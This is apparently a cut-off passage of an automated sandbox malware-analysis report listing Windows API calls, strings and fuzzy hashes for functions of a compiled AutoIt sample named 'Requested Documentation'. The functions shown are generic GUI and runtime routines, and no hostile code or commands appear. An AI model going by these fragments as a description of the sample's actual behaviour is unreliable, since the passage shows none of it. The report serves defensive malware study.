                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A0A630
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A0A661
                                                                              • GetSysColor.USER32(0000000F), ref: 00A0A66D
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00A0A687
                                                                              • SelectObject.GDI32(?,00000000), ref: 00A0A696
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A6C1
                                                                              • GetSysColor.USER32(00000010), ref: 00A0A6C9
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00A0A6D0
                                                                              • FrameRect.USER32(?,?,00000000), ref: 00A0A6DF
                                                                              • DeleteObject.GDI32(00000000), ref: 00A0A6E6
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00A0A731
                                                                              • FillRect.USER32(?,?,00000000), ref: 00A0A763
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0A78E
                                                                                • Part of subcall function 00A0A8CA: GetSysColor.USER32(00000012), ref: 00A0A903
                                                                                • Part of subcall function 00A0A8CA: SetTextColor.GDI32(?,?), ref: 00A0A907
                                                                                • Part of subcall function 00A0A8CA: GetSysColorBrush.USER32(0000000F), ref: 00A0A91D
                                                                                • Part of subcall function 00A0A8CA: GetSysColor.USER32(0000000F), ref: 00A0A928
                                                                                • Part of subcall function 00A0A8CA: GetSysColor.USER32(00000011), ref: 00A0A945
                                                                                • Part of subcall function 00A0A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0A953
                                                                                • Part of subcall function 00A0A8CA: SelectObject.GDI32(?,00000000), ref: 00A0A964
                                                                                • Part of subcall function 00A0A8CA: SetBkColor.GDI32(?,00000000), ref: 00A0A96D
                                                                                • Part of subcall function 00A0A8CA: SelectObject.GDI32(?,?), ref: 00A0A97A
                                                                                • Part of subcall function 00A0A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A999
                                                                                • Part of subcall function 00A0A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0A9B0
                                                                                • Part of subcall function 00A0A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00A0A9C5
                                                                                • Part of subcall function 00A0A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0A9ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: 7386cc32a55ac8f7b60e7823225628d9b7f691370757497c981ac6ab85ae50f9
                                                                              • Instruction ID: 0aac49e9faa7a8190f75e6694d562c54e3dcb47af443fd1b49b3788ab2003e7b
                                                                              • Opcode Fuzzy Hash: 7386cc32a55ac8f7b60e7823225628d9b7f691370757497c981ac6ab85ae50f9
                                                                              • Instruction Fuzzy Hash: 67917072408309EFC720DFA4DC08A5B7BB9FB89321F104B29F952A61E1D771D946CB52
                                                                              Function 00982C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?), ref: 00982CA2
                                                                              • DeleteObject.GDI32(00000000), ref: 00982CE8
                                                                              • DeleteObject.GDI32(00000000), ref: 00982CF3
                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00982CFE
                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00982D09
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 009BC43B
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009BC474
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009BC89D
                                                                                • Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A
                                                                              • SendMessageW.USER32(?,00001053), ref: 009BC8DA
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009BC8F1
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BC907
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BC912
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 2d330984af66e54b2a121778497d5b22fbb9ea21a88140f621dc4ae20a996545
                                                                              • Instruction ID: e039ec35075af7161d324f685a0f9249b4054b186872d255bfe7d6ad0aa4fb0a
                                                                              • Opcode Fuzzy Hash: 2d330984af66e54b2a121778497d5b22fbb9ea21a88140f621dc4ae20a996545
                                                                              • Instruction Fuzzy Hash: 9D1290B0604201EFDB25DF24C984BA9B7E9FF45320F5445A9F896DB662CB31EC42CB91
                                                                              Function 009F74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 009F74DE
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009F759D
                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009F75DB
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009F75ED
                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009F7633
                                                                              • GetClientRect.USER32(00000000,?), ref: 009F763F
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009F7683
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009F7692
                                                                              • GetStockObject.GDI32(00000011), ref: 009F76A2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009F76A6
                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009F76B6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F76BF
                                                                              • DeleteDC.GDI32(00000000), ref: 009F76C8
                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009F76F4
                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 009F770B
                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009F7746
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009F775A
                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 009F776B
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009F779B
                                                                              • GetStockObject.GDI32(00000011), ref: 009F77A6
                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009F77B1
                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009F77BB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                              • API String ID: 2910397461-517079104
                                                                              • Opcode ID: dbbeda1b386b3822a72c3540dc6612b8d5b97fa640b11ed4f44597582ca05af1
                                                                              • Instruction ID: 98a0cd0db0c2431d9abc22d3626176894a3ab60f4162d2372192e92e0902997a
                                                                              • Opcode Fuzzy Hash: dbbeda1b386b3822a72c3540dc6612b8d5b97fa640b11ed4f44597582ca05af1
                                                                              • Instruction Fuzzy Hash: 23A17075A40609BFEB14DBA4DC4AFBEBBB9EB45710F004115FA14A72E1D7B1AD02CB60
                                                                              Function 009EAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EAD1E
                                                                              • GetDriveTypeW.KERNEL32(?,00A0FAC0,?,\\.\,00A0F910), ref: 009EADFB
                                                                              • SetErrorMode.KERNEL32(00000000,00A0FAC0,?,\\.\,00A0F910), ref: 009EAF59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: ac8fa797f1b3c8c023d85d09751e77af7540ca17569aed4878e0219b03c0afa9
                                                                              • Instruction ID: cddde1eb586f512a1d62abba406f131001a07273aaa32d173fc7c81d704930f5
                                                                              • Opcode Fuzzy Hash: ac8fa797f1b3c8c023d85d09751e77af7540ca17569aed4878e0219b03c0afa9
                                                                              • Instruction Fuzzy Hash: 4051B1B0648245ABCB12EB52C982DBDB3A4FF4C700B608D56F407A72B1CA39BD41DB52
                                                                              Function 009868DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: ce6ef88b49b388d2b2120b75106cff144e22867517c0781598f8c337e55b28f5
                                                                              • Instruction ID: d938252e6af64d236c6a9b93db7196b190d229efd8ad823227f931df8caf1175
                                                                              • Opcode Fuzzy Hash: ce6ef88b49b388d2b2120b75106cff144e22867517c0781598f8c337e55b28f5
                                                                              • Instruction Fuzzy Hash: 588110B0600205BBCB21BA60EC83FEA77ACAF56710F044424F945AE2D2EB61DE45D7A1
                                                                              Function 00A0A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00A0A903
                                                                              • SetTextColor.GDI32(?,?), ref: 00A0A907
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A0A91D
                                                                              • GetSysColor.USER32(0000000F), ref: 00A0A928
                                                                              • CreateSolidBrush.GDI32(?), ref: 00A0A92D
                                                                              • GetSysColor.USER32(00000011), ref: 00A0A945
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0A953
                                                                              • SelectObject.GDI32(?,00000000), ref: 00A0A964
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A0A96D
                                                                              • SelectObject.GDI32(?,?), ref: 00A0A97A
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A999
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0A9B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A0A9C5
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0A9ED
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A0AA14
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00A0AA32
                                                                              • DrawFocusRect.USER32(?,?), ref: 00A0AA3D
                                                                              • GetSysColor.USER32(00000011), ref: 00A0AA4B
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A0AA53
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A0AA67
                                                                              • SelectObject.GDI32(?,00A0A5FA), ref: 00A0AA7E
                                                                              • DeleteObject.GDI32(?), ref: 00A0AA89
                                                                              • SelectObject.GDI32(?,?), ref: 00A0AA8F
                                                                              • DeleteObject.GDI32(?), ref: 00A0AA94
                                                                              • SetTextColor.GDI32(?,?), ref: 00A0AA9A
                                                                              • SetBkColor.GDI32(?,?), ref: 00A0AAA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: ea52a282e526faac68a4346c007db95e21b2b7f36b3b84398e2a60885fc45e50
                                                                              • Instruction ID: 28e09dc123cff3d3c0610a42eeebdc8cf5fbdaba9581a2fb56e9c4447b05d17f
                                                                              • Opcode Fuzzy Hash: ea52a282e526faac68a4346c007db95e21b2b7f36b3b84398e2a60885fc45e50
                                                                              • Instruction Fuzzy Hash: 95512B7190020CEFDB21DFA4DC48EAE7BB9EB48320F114625FA11BB2A1D7719942DF90
                                                                              Function 00A089D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A08AC1
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08AD2
                                                                              • CharNextW.USER32(0000014E), ref: 00A08B01
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A08B42
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A08B58
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08B69
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A08B86
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00A08BD8
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A08BEE
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A08C1F
                                                                              • _memset.LIBCMT ref: 00A08C44
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A08C8D
                                                                              • _memset.LIBCMT ref: 00A08CEC
                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A08D16
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A08D6E
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00A08E1B
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A08E3D
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A08E87
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A08EB4
                                                                              • DrawMenuBar.USER32(?), ref: 00A08EC3
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00A08EEB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: 6df3bf1f9a1d7c595a516c1c9e89f4631839d74e0344f467621b7bf27dea1dd0
                                                                              • Instruction ID: 4fc3944f9952503e851056c6e89c84be5e1da8c6842a56644da1b6ab45f07b94
                                                                              • Opcode Fuzzy Hash: 6df3bf1f9a1d7c595a516c1c9e89f4631839d74e0344f467621b7bf27dea1dd0
                                                                              • Instruction Fuzzy Hash: 74E17D7090020DAFDF20DFA0DC84AEE7BB9EF49750F108156F955AA2D1DB788981DF64
                                                                              Function 00A0488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00A049CA
                                                                              • GetDesktopWindow.USER32 ref: 00A049DF
                                                                              • GetWindowRect.USER32(00000000), ref: 00A049E6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A04A48
                                                                              • DestroyWindow.USER32(?), ref: 00A04A74
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A04A9D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A04ABB
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A04AE1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00A04AF6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A04B09
                                                                              • IsWindowVisible.USER32(?), ref: 00A04B29
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A04B44
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A04B58
                                                                              • GetWindowRect.USER32(?,?), ref: 00A04B70
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00A04B96
                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00A04BB0
                                                                              • CopyRect.USER32(?,?), ref: 00A04BC7
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00A04C32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: b1d2d6a46db88a256efad487cdaf81cd91646629e2a848ba86e0a581a4631469
                                                                              • Instruction ID: f0a12d9f49aec77818216c92de7993e0bd84e754ecec697b2afb293676bdd17c
                                                                              • Opcode Fuzzy Hash: b1d2d6a46db88a256efad487cdaf81cd91646629e2a848ba86e0a581a4631469
                                                                              • Instruction Fuzzy Hash: 3AB18CB1604344AFDB04DF64D844B6ABBE4BF88350F048A1DF699AB2A1D771EC06CB55
                                                                              Function 009827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828BC
                                                                              • GetSystemMetrics.USER32(00000007), ref: 009828C4
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828EF
                                                                              • GetSystemMetrics.USER32(00000008), ref: 009828F7
                                                                              • GetSystemMetrics.USER32(00000004), ref: 0098291C
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00982939
                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00982949
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0098297C
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00982990
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 009829AE
                                                                              • GetStockObject.GDI32(00000011), ref: 009829CA
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 009829D5
                                                                                • Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
                                                                                • Part of subcall function 00982344: ScreenToClient.USER32(00A457B0,?), ref: 00982374
                                                                                • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
                                                                                • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7
                                                                              • SetTimer.USER32(00000000,00000000,00000028,00981256), ref: 009829FC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 2b254c85de03326e039efda0e7f0462578b9bb26358e0c1555b5610742296b87
                                                                              • Instruction ID: 5ff8a6e7c5171a730add144e3c452bab28255f48a0a954d9cdd173bb84f7671a
                                                                              • Opcode Fuzzy Hash: 2b254c85de03326e039efda0e7f0462578b9bb26358e0c1555b5610742296b87
                                                                              • Instruction Fuzzy Hash: E8B15D75A0020AEFDF24EFA8DD45BAE7BB4FB48711F104129FA15A72D0DB75A842CB50
                                                                              Function 009DA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 009DA47A
                                                                              • __swprintf.LIBCMT ref: 009DA51B
                                                                              • _wcscmp.LIBCMT ref: 009DA52E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 009DA583
                                                                              • _wcscmp.LIBCMT ref: 009DA5BF
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 009DA5F6
                                                                              • GetDlgCtrlID.USER32(?), ref: 009DA648
                                                                              • GetWindowRect.USER32(?,?), ref: 009DA67E
                                                                              • GetParent.USER32(?), ref: 009DA69C
                                                                              • ScreenToClient.USER32(00000000), ref: 009DA6A3
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 009DA71D
                                                                              • _wcscmp.LIBCMT ref: 009DA731
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 009DA757
                                                                              • _wcscmp.LIBCMT ref: 009DA76B
                                                                                • Part of subcall function 009A362C: _iswctype.LIBCMT ref: 009A3634
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
